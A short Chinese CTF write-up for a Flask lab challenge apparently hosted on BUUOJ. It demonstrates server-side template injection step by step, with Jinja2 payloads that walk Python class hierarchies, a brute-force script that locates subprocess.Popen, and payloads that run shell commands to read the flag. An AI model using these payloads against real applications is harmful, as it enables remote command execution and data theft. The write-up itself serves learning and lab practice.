访问页面,view-source一下;
提示说有参数search,方法为GET;
既然题目有个Flask
,可以试试模板注入漏洞;
?search={{7*7}}
结果返回49
;
首先访问对象的继承类;
{{ ''.__class__.__more__ }}
得到
选择第三个类;
{{ ''.__class__.__mro__[2].__subclasses__() }}
在输出结果里面找到file类,来进行读写;
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/flag').read() }}
然而并不行…
试试其他的办法,估计catch_warnings也是没办法的;
利用subprocess.Popen来执行命令,先找到这个类是第几个,上脚本;
import requests
import re
import html
import time
index = 0
for i in range(0, 1000):
try:
url = "http://1992ff4b-20b6-4eb5-9ba5-2c1148aac764.node3.buuoj.cn/?search={{''.__class__.__mro__[2].__subclasses__()[" + str(i) + "]}}"
r = requests.get(url)
res = re.findall("<h2>You searched for:<\/h2>\W+<h3>(.*)<\/h3>", r.text)
time.sleep(0.1)
#print(res)
# print(r.text)
res = html.unescape(res[0])
print(str(i) + " | " + res)
if "subprocess.Popen" in res:
index = i
break
except:
continue
print("indexo of subprocess.Popen:" + str(index))
得出索引为258
;
?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls',shell=True,stdout=-1).communicate()[0].strip()}}
?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls /flasklight',shell=True,stdout=-1).communicate()[0].strip()}}
?search={{''.__class__.__mro__[2].__subclasses__()[258]('cat /flasklight/coomme_geeeett_youur_flek',shell=True,stdout=-1).communicate()[0].strip()}}
拿到flag
flag{6a877e0b-eb28-442d-b89c-dcc36bbae087}